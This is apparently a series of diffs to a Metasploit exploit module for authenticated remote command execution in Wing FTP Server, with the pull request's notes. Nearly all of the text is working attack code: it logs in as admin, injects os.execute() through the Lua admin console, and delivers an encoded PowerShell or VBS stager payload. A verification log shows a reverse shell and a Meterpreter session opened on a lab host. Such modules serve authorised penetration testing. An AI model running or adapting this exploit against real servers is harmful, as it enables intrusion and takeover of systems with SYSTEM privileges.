@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Wing FTP Server Authenticated Command Execution',
       'Description'    => %q{
         This module exploits the embedded Lua interpreter in the admin web interface for
-        versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
+        versions 3.0.0 and above. When supplying a specially crafted HTTP POST request
         an attacker can use os.execute() to execute arbitrary system commands on
         the target with SYSTEM privileges.
       },
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['URL', 'http://www.wftpserver.com'],
-          ['Admin Console Info', 'https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm']
+          ['URL', 'https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm']
         ],
       'Arch'           => ARCH_X86,
       'Platform'       => 'win',
@@ -54,6 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   @session_cookie = ''
+  @version = ''
 
   def check
     @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])
@@ -64,7 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote
     ver = send_request_cgi(
       'uri'       => '/admin_license.html',
       'method'    => 'POST',
-      'cookie'    => @session_cookie
+      'cookie'    => @session_cookie,
+      'ctype'     => 'text/plain;charset=UTF-8'
     )
 
     unless ver
@@ -76,12 +78,12 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe
     end
 
-    version = ver.get_html_document.at('span').text.to_s
-    vprint_status "Found #{version}"
+    @version = Gem::Version.new(ver.body.scan(/Wing FTP Server ([\d\.]+)/).flatten.first)
+    vprint_status "Found Wing FTP Server #{@version}"
 
-    # LUA capabilities and administrator console were added in version 3.0.0
-    if version[/([3-4]\.[0-3]\.[0-8])/]
-      print_good("#{version} appears vulnerable.")
+    # Lua capabilities and administrator console were added in version 3.0.0
+    if @version >= Gem::Version.new('3.0.0')
+      print_good("Wing FTP Server #{@version}: appears vulnerable.")
       return CheckCode::Appears
     end
 
@@ -93,13 +95,19 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
 
+    # TODO if target version == 6.0.2.
+
     case target.name
     when 'PowerShell'
       print_status('Executing payload via Powershell...')
-      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
+      # Our command is sent URL-encoded. Version 6.0.2 does not URL decode characters. This causes exploit to fail.
+      # Completely encode Powershell cmd with base64 to subvert this.
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true)
       execute_command(psh_command)
     when 'CmdStager'
       print_status("Sending payload")
+      # Unfortunately, cmdstager still suffers from the "no URL decode" of version 6.0.2.
+      # Recommended: don't use cmdstager versus 6.0.2. Auto-change target? Doesn't seem like a good idea.
       # Execute the cmdstager, max length of the commands is ~1500
       execute_cmdstager(flavor: :vbs, linemax: 1500)
     end
@@ -111,9 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
     command = "os.execute([[#{cmd}]])"
 
     res = send_request_cgi(
-      'uri'       => '/admin_lua_script.html',
+      'uri'       => "/admin_lua_script.html?r=0.#{rand_text_numeric(16)}",
       'method'    => 'POST',
       'cookie'    => @session_cookie,
+      'ctype'     => 'text/plain;charset=UTF-8',
       'vars_post' => { 'command' => command }
     )
 
@@ -142,14 +151,17 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if res.code == 200 && res.body =~ /location='main.html\?lang=english';/
-      res.get_cookies.split(';').each do |cookie|
-        cookie.split(',').each do |value|
+      res.get_cookies.split('; ').each do |cookie|
+        cookie.split(' ,').each do |value|
           if value.split('=')[0] =~ /UIDADMIN/
             vprint_status("Authentication successful, got session cookie #{value.split('=')[1]}")
-            return value.to_s
+          elsif value.split('=')[0] =~ /admin_lang/
+            language = value
           end
         end
       end
+      proper_cookie = language + ' ' + res.get_cookies.split('; ')[0] + '; ' + 'admin_login_name=' + datastore['USERNAME'] + ';'
+      return proper_cookie
     end
 
     print_error("#{peer} - Authentication failed")

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -3,10 +3,14 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'msf/core/exploit/powershell'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
+
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -19,69 +23,80 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Nicholas Nam <nick[at]executionflow.org>'
+          'Nicholas Nam <nick[at]executionflow.org>',
+          'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com> (minor improvements)'
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'http://www.wftpserver.com' ]
+          ['URL', 'http://www.wftpserver.com']
         ],
       'Arch'           => ARCH_X86,
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows VBS Stager', {} ]
+          ['PowerShell', {}],
+          ['CmdStager', {}]
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Jun 19 2014',
-      'DefaultTarget'  => 0
-    ))
+      'DefaultTarget'  => 0))
 
     register_options(
       [
         Opt::RPORT(5466),
         OptString.new('USERNAME', [true, 'Admin username', '']),
-        OptString.new('PASSWORD', [true, 'Admin password', ''])
+        OptString.new('PASSWORD', [true, 'Admin password', '']),
+        OptString.new('UIDADMIN', [false, 'Session cookie', ''])
       ], self.class
     )
     deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def check
-    res = send_request_cgi(
-      {
-        'uri'     =>  '/admin_login.html',
-        'method'  => 'GET'
-      })
+    @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])
 
-    if !res
-      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
-    elsif res.code != 200
-      fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
-    elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
-      return Exploit::CheckCode::Appears
+    ver = send_request_cgi(
+      'uri'       => '/admin_license.html',
+      'method'    => 'POST',
+      'cookie'    => 'UIDADMIN=' + datastore['UIDADMIN']
+    )
+
+    if ver.code != 200
+      fail_with(Failure::NotFound, "#{peer} - License page was not found.")
+    elsif ver.get_html_document.at('span').to_s.include? "Wing FTP Server 4.3.8"
+      return Exploit::CheckCode::Vulnerable
     end
 
     Exploit::CheckCode::Safe
   end
 
   def exploit
-    username = datastore['USERNAME']
-    password = datastore['PASSWORD']
-    @session_cookie = authenticate(username, password)
+    unless [CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+    end
 
-    print_status("Sending payload")
-    # Execute the cmdstager, max length of the commands is ~1500
-    execute_cmdstager(flavor: :vbs, linemax: 1500)
+    case target.name
+    when 'PowerShell'
+      print_status('Executing payload via Powershell...')
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
+      execute_command(psh_command)
+    when 'CmdStager'
+      print_status("Sending payload")
+      # Execute the cmdstager, max length of the commands is ~1500
+      execute_cmdstager(flavor: :vbs, linemax: 1500)
+    end
   end
 
   def execute_command(cmd, _opts = {})
-    command = "os.execute('cmd /c #{cmd}')"
+    # Powershell cmd has a lot of special characters. Wrap it with [[ ]] to prevent problems.
+    # We also don't need to append "cmd.exe /c" for the commands
+    command = "os.execute([[#{cmd}]])"
 
     res = send_request_cgi(
       'uri'       => '/admin_lua_script.html',
       'method'    => 'POST',
-      'cookie'    => @session_cookie,
+      'cookie'    => 'UIDADMIN=' + datastore['UIDADMIN'],
       'vars_post' => { 'command' => command }
     )
 
@@ -91,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def authenticate(username, password)
-    print_status("Authenticating")
+    print_status("Authenticating...")
     res = send_request_cgi(
       'uri'       => '/admin_loginok.html',
       'method'    => 'POST',
@@ -117,6 +132,6 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
 
-    "UIDADMIN=#{uidadmin}"
+    datastore['UIDADMIN'] = uidadmin.to_s
   end
 end

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -84,9 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     @version = Gem::Version.new(ver.body.scan(/Wing FTP Server ([\d\.]+)/).flatten.first)
-    vprint_status("Found Wing FTP Server #{@version}")
+    print_status("Found Wing FTP Server #{@version}")
 
-    # Lua capabilities and administrator console were added in version 3.0.0, so everything above that is vulnerable
+    # Lua capabilities and administrator console were added in version 3.0.0, so everything above that is (probably) vulnerable
     unless @version >= Gem::Version.new('3.0.0')
       @vuln_check = false
       return CheckCode::Safe
@@ -100,8 +100,13 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    if winenv_path.code == 200 && winenv_path.body.include?('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\')
-      @psh = true
+    if winenv_path.code == 200
+      winenv_path.body.split(';').each do |path_val|
+        if (/powershell/i) =~ path_val
+          print_good("Found Powershell at #{path_val}")
+          @psh = true
+        end
+      end
     else
       @psh = false
     end
@@ -118,21 +123,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if @psh == true
       print_status('Executing payload via PowerShell...')
-      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true)
       execute_command(psh_command)
     else
-      if @version >= Gem::Version.new('6.0.2')
-        print_warning("Version #{@version} detected, expect CmdStager to fail!")
+      if @version > Gem::Version.new('4.3.8')
+        fail_with(Failure::NoTarget, "Version #{@version} detected and PowerShell not found, aborting exploit attempt!")
       end
       print_warning("PowerShell not found, will revert to CmdStager for payload delivery!")
-      print_status("Sending payload")
+      print_status("Sending payload...")
       # Execute the CmdStager, max length of the commands is ~1500
       execute_cmdstager(flavor: :vbs, linemax: 1500)
     end
   end
 
   def execute_command(cmd,_opts = {})
-    # Wrap cmd it with [[ ]] to prevent potential problems.
+    # Wrap cmd with [[ ]] to prevent potential problems.
     if @vuln_check == true
       command = "print(os.getenv([[#{cmd}]]))"
     else
@@ -140,11 +145,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     res = send_request_cgi(
-      'uri'       => '/admin_lua_script.html',
-      'method'    => 'POST',
-      'cookie'    => @session_cookie,
-      'ctype'     => 'text/plain;charset=UTF-8',
-      'vars_post' => { 'command' => command }
+      'uri'       		=> '/admin_lua_script.html',
+      'method'    		=> 'POST',
+      'encode_params' => true,
+      'cookie'    		=> @session_cookie,
+      'ctype'     		=> 'text/plain;charset=UTF-8',
+      'vars_post' 		=> { 'command' => command }
     )
 
     unless res && res.code == 200
@@ -185,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    print_error("#{peer} - Authentication failed")
+    print_error("#{peer} - Authentication failed!")
     return nil
   end
 end

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -84,6 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # Lua capabilities and administrator console were added in version 3.0.0
     if @version >= Gem::Version.new('3.0.0')
       print_good("Wing FTP Server #{@version}: appears vulnerable.")
+      if @version >= Gem::Version.new('6.0.2')
+        print_warning("Version #{@version} detected, expect CmdStager to fail!")
+      end
       return CheckCode::Appears
     end
 
@@ -95,19 +98,21 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
 
-    # TODO if target version == 6.0.2.
-
     case target.name
     when 'PowerShell'
       print_status('Executing payload via Powershell...')
       # Our command is sent URL-encoded. Version 6.0.2 does not URL decode characters. This causes exploit to fail.
       # Completely encode Powershell cmd with base64 to subvert this.
-      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true)
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
       execute_command(psh_command)
     when 'CmdStager'
+      if @version >= Gem::Version.new('6.0.2')
+        print_warning("Version #{@version} detected, expect CmdStager to fail!")
+      end
+
       print_status("Sending payload")
-      # Unfortunately, cmdstager still suffers from the "no URL decode" of version 6.0.2.
-      # Recommended: don't use cmdstager versus 6.0.2. Auto-change target? Doesn't seem like a good idea.
+      # Unfortunately, CmdStager still suffers from the "no URL decode" of version 6.0.2.
+      # Recommended: don't use CmdStager versus 6.0.2.
       # Execute the cmdstager, max length of the commands is ~1500
       execute_cmdstager(flavor: :vbs, linemax: 1500)
     end
@@ -119,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
     command = "os.execute([[#{cmd}]])"
 
     res = send_request_cgi(
-      'uri'       => "/admin_lua_script.html?r=0.#{rand_text_numeric(16)}",
+      'uri'       => '/admin_lua_script.html',
       'method'    => 'POST',
       'cookie'    => @session_cookie,
       'ctype'     => 'text/plain;charset=UTF-8',
@@ -155,12 +160,10 @@ class MetasploitModule < Msf::Exploit::Remote
         cookie.split(' ,').each do |value|
           if value.split('=')[0] =~ /UIDADMIN/
             vprint_status("Authentication successful, got session cookie #{value.split('=')[1]}")
-          elsif value.split('=')[0] =~ /admin_lang/
-            language = value
           end
         end
       end
-      proper_cookie = language + ' ' + res.get_cookies.split('; ')[0] + '; ' + 'admin_login_name=' + datastore['USERNAME'] + ';'
+      proper_cookie = res.get_cookies.split('; ')[1] + ';' + res.get_cookies.split('; ')[0] + '; ' + 'admin_login_name=' + datastore['USERNAME'] + ';'
       return proper_cookie
     end
 

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
           'Nicholas Nam <nick[at]executionflow.org>',
-          'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com> (minor improvements)'
+          'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # minor improvements
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -46,8 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(5466),
         OptString.new('USERNAME', [true, 'Admin username', '']),
-        OptString.new('PASSWORD', [true, 'Admin password', '']),
-        OptString.new('UIDADMIN', [false, 'Session cookie', ''])
+        OptString.new('PASSWORD', [true, 'Admin password', ''])
       ], self.class
     )
     deregister_options('CMDSTAGER::FLAVOR')
@@ -64,11 +63,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if ver.code != 200
       fail_with(Failure::NotFound, "#{peer} - License page was not found.")
-    elsif ver.get_html_document.at('span').to_s.include? "Wing FTP Server 4.3.8"
-      return Exploit::CheckCode::Vulnerable
-    end
+    elsif ver.get_html_document.text.to_s.include? "Wing FTP Server"
+      version = ver.get_html_document.at('span').text.to_s
+      if version[/([0-4]\.[0-3]\.[0-8])/]
+        print_good("Detected version: #{version}")
+        return Exploit::CheckCode::Vulnerable
+      end
 
-    Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Safe
+    end
   end
 
   def exploit

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -52,22 +52,25 @@ class MetasploitModule < Msf::Exploit::Remote
     deregister_options('CMDSTAGER::FLAVOR')
   end
 
+  @session_cookie = ''
+
   def check
-    @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+    authenticate(datastore['USERNAME'], datastore['PASSWORD'])
 
     ver = send_request_cgi(
       'uri'       => '/admin_license.html',
       'method'    => 'POST',
-      'cookie'    => 'UIDADMIN=' + datastore['UIDADMIN']
+      'cookie'    => @session_cookie
     )
 
     if ver.code != 200
-      fail_with(Failure::NotFound, "#{peer} - License page was not found.")
+      return Exploit::CheckCode::Unknown
     elsif ver.get_html_document.text.to_s.include? "Wing FTP Server"
       version = ver.get_html_document.at('span').text.to_s
+      vprint_status "Found #{version}"
       if version[/([0-4]\.[0-3]\.[0-8])/]
-        print_good("Detected version: #{version}")
-        return Exploit::CheckCode::Vulnerable
+        print_good("#{version} appears vulnerable.")
+        return Exploit::CheckCode::Appears
       end
 
       return Exploit::CheckCode::Safe
@@ -75,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless [CheckCode::Vulnerable].include? check
+    unless [CheckCode::Appears].include? check
       fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
 
@@ -99,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'uri'       => '/admin_lua_script.html',
       'method'    => 'POST',
-      'cookie'    => 'UIDADMIN=' + datastore['UIDADMIN'],
+      'cookie'    => @session_cookie,
       'vars_post' => { 'command' => command }
     )
 
@@ -122,19 +125,16 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    uidadmin = ''
     if !res
       fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
     elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
       res.get_cookies.split(';').each do |cookie|
         cookie.split(',').each do |value|
-          uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
+          @session_cookie = value.to_s if value.split('=')[0] =~ /UIDADMIN/
         end
       end
     else
       fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
-
-    datastore['UIDADMIN'] = uidadmin.to_s
   end
 end

--- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
+++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -36,8 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          ['PowerShell', {}],
-          ['CmdStager', {}]
+          ['Wing FTP Server >= 3.0.0', {}]
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Jun 19 2014',
@@ -51,10 +50,16 @@ class MetasploitModule < Msf::Exploit::Remote
       ], self.class
     )
     deregister_options('CMDSTAGER::FLAVOR')
+    deregister_options('CMDSTAGER::DECODER')
+    deregister_options('URIPATH')
+    deregister_options('SRVHOST')
+    deregister_options('SRVPORT')
   end
 
   @session_cookie = ''
   @version = ''
+  @psh = false
+  @vuln_check = false
 
   def check
     @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])
@@ -69,59 +74,82 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype'     => 'text/plain;charset=UTF-8'
     )
 
-    unless ver
-      vprint_error "Connection failed!"
+    unless ver # cannot connect
+      vprint_error("Connection failed!")
       return CheckCode::Unknown
     end
 
-    unless ver.code == 200 && ver.get_html_document.text.to_s.include?('Wing FTP Server')
+    unless ver.code == 200 && ver.get_html_document.text.to_s.include?('Wing FTP Server') # does not contain Wing FTP Server
       return CheckCode::Safe
     end
 
     @version = Gem::Version.new(ver.body.scan(/Wing FTP Server ([\d\.]+)/).flatten.first)
-    vprint_status "Found Wing FTP Server #{@version}"
+    vprint_status("Found Wing FTP Server #{@version}")
 
-    # Lua capabilities and administrator console were added in version 3.0.0
+    # Lua capabilities and administrator console were added in version 3.0.0, so everything above that is vulnerable
     if @version >= Gem::Version.new('3.0.0')
-      print_good("Wing FTP Server #{@version}: appears vulnerable.")
-      if @version >= Gem::Version.new('6.0.2')
-        print_warning("Version #{@version} detected, expect CmdStager to fail!")
+
+      @vuln_check = true
+      vuln_or_not = execute_command("PATH") # get PATH variables using os.getenv() in Lua
+
+      unless vuln_or_not # cannot connect
+        vprint_error("Connection failed!")
+        return CheckCode::Unknown
       end
-      return CheckCode::Appears
+
+      unless !vuln_or_not.code == 200 && !vuln_or_not.get_html_document.text.to_s.include?("System32") # includes 'System32' in response
+        if vuln_or_not.body.include?("PowerShell") # also includes 'Powershell' in response
+          @psh = true
+        else
+          @psh = false
+        end
+
+        @vuln_check = false
+        return CheckCode::Vulnerable
+      end
+
+      @vuln_check = false
+      return CheckCode::Safe
     end
 
+    @vuln_check = false
     return CheckCode::Safe
   end
 
   def exploit
-    unless [CheckCode::Appears].include? check
-      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+    vprint_status("Authenticating...")
+    unless [CheckCode::Vulnerable].include? check
+      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
     end
 
-    case target.name
-    when 'PowerShell'
-      print_status('Executing payload via Powershell...')
-      # Our command is sent URL-encoded. Version 6.0.2 does not URL decode characters. This causes exploit to fail.
-      # Completely encode Powershell cmd with base64 to subvert this.
+    case @psh
+    when true
+      print_status('Executing payload via PowerShell...')
+      # cmd is sent URL-encoded. Version 6.0.2 does not URL decode characters, and this causes exploit to fail.
+      # Completely encode PowerShell cmd with base64 to subvert this.
       psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
       execute_command(psh_command)
-    when 'CmdStager'
+    when false
       if @version >= Gem::Version.new('6.0.2')
-        print_warning("Version #{@version} detected, expect CmdStager to fail!")
+        print_warning("Version #{@version} detected, expect CmdStager to fail!") # CmdStager fails vs. 6.0.2
       end
-
+      print_warning("PowerShell not found, will revert to CmdStager for payload delivery!")
       print_status("Sending payload")
       # Unfortunately, CmdStager still suffers from the "no URL decode" of version 6.0.2.
       # Recommended: don't use CmdStager versus 6.0.2.
-      # Execute the cmdstager, max length of the commands is ~1500
+      # Execute the CmdStager, max length of the commands is ~1500
       execute_cmdstager(flavor: :vbs, linemax: 1500)
     end
   end
 
-  def execute_command(cmd, _opts = {})
-    # Powershell cmd has a lot of special characters. Wrap it with [[ ]] to prevent problems.
+  def execute_command(cmd,_opts = {})
+    # Wrap cmd it with [[ ]] to prevent potential problems.
     # We also don't need to append "cmd.exe /c" for the commands
-    command = "os.execute([[#{cmd}]])"
+    if @vuln_check == false
+      command = "os.execute([[#{cmd}]])"
+    else
+      command = "print(os.getenv([[#{cmd}]]))" # PATH is a good env. variable to get
+    end
 
     res = send_request_cgi(
       'uri'       => '/admin_lua_script.html',
@@ -134,10 +162,13 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code != 200
       fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
     end
+
+    unless @vuln_check == false
+      return res
+    end
   end
 
   def authenticate(username, password)
-    print_status("Authenticating...")
     res = send_request_cgi(
       'uri'       => '/admin_loginok.html',
       'method'    => 'POST',
@@ -156,15 +187,14 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if res.code == 200 && res.body =~ /location='main.html\?lang=english';/
-      res.get_cookies.split('; ').each do |cookie|
-        cookie.split(' ,').each do |value|
+      res.get_cookies.split(';').each do |cookie|
+        cookie.split(',').each do |value|
           if value.split('=')[0] =~ /UIDADMIN/
-            vprint_status("Authentication successful, got session cookie #{value.split('=')[1]}")
+            vprint_good("Authentication successful, got session cookie #{value.split('=')[1]}")
+            return res.get_cookies.split(';')[0]
           end
         end
       end
-      proper_cookie = res.get_cookies.split('; ')[1] + ';' + res.get_cookies.split('; ')[0] + '; ' + 'admin_login_name=' + datastore['USERNAME'] + ';'
-      return proper_cookie
     end
 
     print_error("#{peer} - Authentication failed")


### PR DESCRIPTION
### Notes ###
Improved the check method and added documentation. Also added a separate PowerShell target (see issue #10980) for in-memory execution.

If authentication is required for the exploit, we might as well go all the way, and do both the check and exploit using one authentication. Specific details about the installed Wing FTP Server version can only be obtained after authentication, so this makes it clear about what version of the vulnerable app we are exploiting.

As of 12/10/2018, The module has been further improved to get hard evidence about the existence of the vulnerability.

### Vulnerable application ###

All versions of Wing FTP Server from 3.0.0 and up are vulnerable.

Upgraded module has been tested on a Windows Server 2016 Datacenter x64 with the following versions:

- Wing FTP Server 4.3.8
- Wing FTP Server 6.0.2

Original module has been tested on Windows 7 SP1 and Windows 8.1 with the following versions:

- Wing FTP Server 4.3.6
- Wing FTP Server 4.3.8

### Verification Steps ###

- [x] Start `msfconsole`
- [x] `use exploit/windows/ftp/wing_ftp_admin_exec`
- [x] `set RHOST <target-ip>`
- [x] `set USERNAME <valid-username>`
- [x] `set PASSWORD <valid-password>`
- [x] `exploit`
- [x] **Verify** that you get a shell

```
msf5 > use exploit/windows/ftp/wing_ftp_admin_exec 
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
RHOST => 192.168.136.151
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
PASSWORD => password
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit

[*] Started reverse TCP handler on 192.168.136.146:4444 
[*] Authenticating...
[+] Authentication successful, got session cookie 14bcf0bbb389113e879e5dcaa561f65f
[*] Found Wing FTP Server 6.0.2
[*] Executing payload via PowerShell...
[*] Powershell command length: 5995
[*] Sending stage (179779 bytes) to 192.168.136.151
[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:4895) at 2018-12-10 20:54:51 +0800

meterpreter > sysinfo
Computer        : 2K16DTCTR
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
```
## TODO ##
- [x] Implement version check using `Gem::Version`
- [ ] Find some way to make CmdStager work with version `6.0.2`